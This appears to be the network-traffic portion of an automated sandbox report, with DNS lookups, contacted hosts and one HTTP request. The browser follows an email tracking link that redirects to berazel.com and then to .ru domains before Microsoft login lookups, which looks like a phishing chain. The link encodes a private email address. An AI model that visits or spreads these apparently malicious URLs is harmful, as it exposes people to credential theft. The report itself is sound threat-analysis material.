                                                                                                                          Dec 19, 2024 17:08:03.607578039 CET53629341.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:08:06.191131115 CET53628191.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:08:08.495021105 CET53645281.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:08:32.155467987 CET53641381.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:08:48.662383080 CET53620981.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:08:51.530855894 CET138138192.168.2.16192.168.2.255
                                                                                                                          Dec 19, 2024 17:08:59.079041004 CET53525101.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:00.307209015 CET5187653192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:00.307559967 CET6504753192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:00.746396065 CET53650471.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:00.746663094 CET53518761.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:04.387897015 CET5825153192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:04.388137102 CET5616353192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:04.388525963 CET5695653192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:04.388681889 CET6518453192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:04.389014006 CET6138853192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:04.389231920 CET5259653192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:04.525202036 CET53582511.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:04.525583982 CET53651841.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:04.525646925 CET53569561.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:04.525680065 CET53561631.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:04.526107073 CET53613881.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:04.528795004 CET53525961.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.619622946 CET5173253192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:06.619815111 CET6312853192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:06.633306980 CET6086953192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:06.633550882 CET6365253192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:06.757108927 CET53517321.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.757566929 CET53631281.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.770791054 CET53608691.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.770986080 CET53636521.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.174695015 CET5147953192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:08.174882889 CET5331853192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:08.202651978 CET4926853192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:08.202961922 CET4981153192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:08.312252998 CET53533181.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.313450098 CET53514791.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.339843988 CET53492681.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.342801094 CET53498111.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:13.223836899 CET6110553192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:13.223836899 CET6060353192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:13.361017942 CET53611051.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:13.361284018 CET53606031.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:26.284558058 CET5836053192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:26.285023928 CET5647653192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:26.812526941 CET53564761.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:26.812705040 CET53583601.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:30.391006947 CET5660053192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:30.391166925 CET5428453192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:30.391650915 CET5164653192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:30.391892910 CET5324053192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:30.529397011 CET53566001.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:30.530230045 CET53542841.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:30.683751106 CET53516461.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:30.708267927 CET53532401.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:30.709384918 CET5191953192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:30.847111940 CET53519191.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:30.873044968 CET6462353192.168.2.168.8.8.8
                                                                                                                          Dec 19, 2024 17:09:30.873743057 CET4931553192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:31.011352062 CET53493151.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:31.012770891 CET53646238.8.8.8192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:31.893312931 CET5045753192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:31.893508911 CET5812553192.168.2.161.1.1.1
                                                                                                                          Dec 19, 2024 17:09:32.036411047 CET53581251.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:32.036439896 CET53504571.1.1.1192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:34.500574112 CET53646881.1.1.1192.168.2.16
                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                          Dec 19, 2024 17:07:55.003575087 CET192.168.2.161.1.1.1c1fd(Port unreachable)Destination Unreachable
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Dec 19, 2024 17:07:49.397011042 CET192.168.2.161.1.1.10x24f5Standard query (0)go.eu.sparkpostmail1.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:49.397236109 CET192.168.2.161.1.1.10xde85Standard query (0)go.eu.sparkpostmail1.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:52.396085024 CET192.168.2.161.1.1.10x18beStandard query (0)berazel.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:52.396204948 CET192.168.2.161.1.1.10xd203Standard query (0)berazel.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:53.306292057 CET192.168.2.161.1.1.10x1824Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:53.306500912 CET192.168.2.161.1.1.10x39acStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:53.421106100 CET192.168.2.161.1.1.10xe51Standard query (0)berazel.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:53.421276093 CET192.168.2.161.1.1.10x90bfStandard query (0)berazel.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:56.861903906 CET192.168.2.161.1.1.10x705aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:56.862131119 CET192.168.2.161.1.1.10x9c29Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.606412888 CET192.168.2.161.1.1.10x39a9Standard query (0)berazel.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.606550932 CET192.168.2.161.1.1.10xdb85Standard query (0)berazel.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.607958078 CET192.168.2.161.1.1.10x80dfStandard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.608165026 CET192.168.2.161.1.1.10xab8aStandard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.609328032 CET192.168.2.161.1.1.10xd60Standard query (0)pbs.twimg.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.609509945 CET192.168.2.161.1.1.10xc73bStandard query (0)pbs.twimg.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:59.532171965 CET192.168.2.161.1.1.10x5810Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:59.532392025 CET192.168.2.161.1.1.10x80e3Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:01.147695065 CET192.168.2.161.1.1.10xd7c2Standard query (0)pbs.twimg.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:01.147695065 CET192.168.2.161.1.1.10xd759Standard query (0)pbs.twimg.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:01.873418093 CET192.168.2.161.1.1.10x732cStandard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:01.873611927 CET192.168.2.161.1.1.10x16b9Standard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:03.370065928 CET192.168.2.161.1.1.10xb4f4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:03.370444059 CET192.168.2.161.1.1.10x7049Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:00.307209015 CET192.168.2.161.1.1.10xfd54Standard query (0)wv.itzraterbi.ruA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:00.307559967 CET192.168.2.161.1.1.10x552cStandard query (0)wv.itzraterbi.ru65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.387897015 CET192.168.2.161.1.1.10x750Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.388137102 CET192.168.2.161.1.1.10x58d1Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.388525963 CET192.168.2.161.1.1.10x287fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.388681889 CET192.168.2.161.1.1.10xa2c7Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.389014006 CET192.168.2.161.1.1.10xa523Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.389231920 CET192.168.2.161.1.1.10x6628Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:06.619622946 CET192.168.2.161.1.1.10x7982Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:06.619815111 CET192.168.2.161.1.1.10xc91cStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:06.633306980 CET192.168.2.161.1.1.10xd4caStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:06.633550882 CET192.168.2.161.1.1.10xe5f9Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:08.174695015 CET192.168.2.161.1.1.10xc242Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:08.174882889 CET192.168.2.161.1.1.10xcec1Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:08.202651978 CET192.168.2.161.1.1.10xd384Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:08.202961922 CET192.168.2.161.1.1.10x933Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:13.223836899 CET192.168.2.161.1.1.10xe7e3Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:13.223836899 CET192.168.2.161.1.1.10x97fcStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:26.284558058 CET192.168.2.161.1.1.10x3633Standard query (0)9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ruA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:26.285023928 CET192.168.2.161.1.1.10xeb1Standard query (0)9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:30.391006947 CET192.168.2.161.1.1.10xc7b0Standard query (0)9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ruA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:30.391166925 CET192.168.2.161.1.1.10x6569Standard query (0)9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:30.391650915 CET192.168.2.161.1.1.10x2260Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:30.391892910 CET192.168.2.161.1.1.10x99b9Standard query (0)www.microsoftonline.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:30.709384918 CET192.168.2.161.1.1.10xbc53Standard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:30.873044968 CET192.168.2.168.8.8.80x4406Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:30.873743057 CET192.168.2.161.1.1.10x5b93Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:31.893312931 CET192.168.2.161.1.1.10x38ecStandard query (0)www.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:31.893508911 CET192.168.2.161.1.1.10xbf4Standard query (0)www.microsoftonline.com65IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Dec 19, 2024 17:07:50.000262976 CET1.1.1.1192.168.2.160x24f5No error (0)go.eu.sparkpostmail1.com52.19.163.183A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:50.000262976 CET1.1.1.1192.168.2.160x24f5No error (0)go.eu.sparkpostmail1.com54.246.238.147A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:50.000262976 CET1.1.1.1192.168.2.160x24f5No error (0)go.eu.sparkpostmail1.com18.200.122.58A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:53.443191051 CET1.1.1.1192.168.2.160x39acNo error (0)www.google.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:53.443552971 CET1.1.1.1192.168.2.160x1824No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:55.002902985 CET1.1.1.1192.168.2.160x18beNo error (0)berazel.com151.106.103.155A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:55.003493071 CET1.1.1.1192.168.2.160xe51No error (0)berazel.com151.106.103.155A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:56.998819113 CET1.1.1.1192.168.2.160x705aNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:56.998835087 CET1.1.1.1192.168.2.160x9c29No error (0)www.google.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.743228912 CET1.1.1.1192.168.2.160x39a9No error (0)berazel.com151.106.103.155A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.746021986 CET1.1.1.1192.168.2.160xd60No error (0)pbs.twimg.comdualstack.twimg.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.746021986 CET1.1.1.1192.168.2.160xd60No error (0)dualstack.twimg.twitter.map.fastly.net199.232.168.159A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.746102095 CET1.1.1.1192.168.2.160xc73bNo error (0)pbs.twimg.comdualstack.twimg.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.956701994 CET1.1.1.1192.168.2.160xab8aNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.986948013 CET1.1.1.1192.168.2.160x80dfNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.986948013 CET1.1.1.1192.168.2.160x80dfNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.986948013 CET1.1.1.1192.168.2.160x80dfNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.986948013 CET1.1.1.1192.168.2.160x80dfNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:58.986948013 CET1.1.1.1192.168.2.160x80dfNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:59.671263933 CET1.1.1.1192.168.2.160x80e3No error (0)www.google.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:07:59.671279907 CET1.1.1.1192.168.2.160x5810No error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:01.292361975 CET1.1.1.1192.168.2.160xd759No error (0)pbs.twimg.comdualstack.twimg.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:01.297931910 CET1.1.1.1192.168.2.160xd7c2No error (0)pbs.twimg.comdualstack.twimg.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:01.297931910 CET1.1.1.1192.168.2.160xd7c2No error (0)dualstack.twimg.twitter.map.fastly.net199.232.168.159A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:02.010236025 CET1.1.1.1192.168.2.160x732cNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:02.010236025 CET1.1.1.1192.168.2.160x732cNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.65A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:02.010236025 CET1.1.1.1192.168.2.160x732cNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.47A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:02.010236025 CET1.1.1.1192.168.2.160x732cNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.72A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:02.010236025 CET1.1.1.1192.168.2.160x732cNo error (0)d26p066pn2w0s0.cloudfront.net13.227.8.64A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:02.011806965 CET1.1.1.1192.168.2.160x16b9No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:03.507235050 CET1.1.1.1192.168.2.160xb4f4No error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:08:03.507746935 CET1.1.1.1192.168.2.160x7049No error (0)www.google.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:00.746396065 CET1.1.1.1192.168.2.160x552cNo error (0)wv.itzraterbi.ru65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:00.746663094 CET1.1.1.1192.168.2.160xfd54No error (0)wv.itzraterbi.ru172.67.163.118A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:00.746663094 CET1.1.1.1192.168.2.160xfd54No error (0)wv.itzraterbi.ru104.21.66.188A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.525202036 CET1.1.1.1192.168.2.160x750No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.525202036 CET1.1.1.1192.168.2.160x750No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.525202036 CET1.1.1.1192.168.2.160x750No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.525202036 CET1.1.1.1192.168.2.160x750No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.525583982 CET1.1.1.1192.168.2.160xa2c7No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.525646925 CET1.1.1.1192.168.2.160x287fNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.525646925 CET1.1.1.1192.168.2.160x287fNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.526107073 CET1.1.1.1192.168.2.160xa523No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.526107073 CET1.1.1.1192.168.2.160xa523No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:04.528795004 CET1.1.1.1192.168.2.160x6628No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:06.757108927 CET1.1.1.1192.168.2.160x7982No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:06.757108927 CET1.1.1.1192.168.2.160x7982No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:06.757566929 CET1.1.1.1192.168.2.160xc91cNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:06.770791054 CET1.1.1.1192.168.2.160xd4caNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:06.770791054 CET1.1.1.1192.168.2.160xd4caNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:06.770791054 CET1.1.1.1192.168.2.160xd4caNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:06.770791054 CET1.1.1.1192.168.2.160xd4caNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:08.312252998 CET1.1.1.1192.168.2.160xcec1No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:08.313450098 CET1.1.1.1192.168.2.160xc242No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:08.313450098 CET1.1.1.1192.168.2.160xc242No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:08.339843988 CET1.1.1.1192.168.2.160xd384No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:08.339843988 CET1.1.1.1192.168.2.160xd384No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:08.342801094 CET1.1.1.1192.168.2.160x933No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:13.361017942 CET1.1.1.1192.168.2.160xe7e3No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:26.812526941 CET1.1.1.1192.168.2.160xeb1No error (0)9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:26.812705040 CET1.1.1.1192.168.2.160x3633No error (0)9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru172.67.130.58A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:26.812705040 CET1.1.1.1192.168.2.160x3633No error (0)9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru104.21.3.44A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:30.529397011 CET1.1.1.1192.168.2.160xc7b0No error (0)9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru172.67.130.58A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:30.529397011 CET1.1.1.1192.168.2.160xc7b0No error (0)9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru104.21.3.44A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:30.530230045 CET1.1.1.1192.168.2.160x6569No error (0)9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru65IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:30.683751106 CET1.1.1.1192.168.2.160x2260No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:30.708267927 CET1.1.1.1192.168.2.160x99b9No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:30.847111940 CET1.1.1.1192.168.2.160xbc53No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:31.011352062 CET1.1.1.1192.168.2.160x5b93No error (0)google.com172.217.17.78A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:31.012770891 CET8.8.8.8192.168.2.160x4406No error (0)google.com142.250.181.110A (IP address)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:32.036411047 CET1.1.1.1192.168.2.160xbf4No error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Dec 19, 2024 17:09:32.036439896 CET1.1.1.1192.168.2.160x38ecNo error (0)www.microsoftonline.commicrosoftonline.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          • go.eu.sparkpostmail1.com
                                                                                                                          • berazel.com
                                                                                                                          • https:
                                                                                                                            • www.google.com
                                                                                                                            • pbs.twimg.com
                                                                                                                            • logo.clearbit.com
                                                                                                                            • wv.itzraterbi.ru
                                                                                                                            • code.jquery.com
                                                                                                                            • challenges.cloudflare.com
                                                                                                                            • cdnjs.cloudflare.com
                                                                                                                            • 9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru
                                                                                                                          • a.nel.cloudflare.com
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.164971052.19.163.1834437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:07:51 UTC837OUTGET /f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~ HTTP/1.1
                                                                                                                          Host: go.eu.sparkpostmail1.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-User: ?1
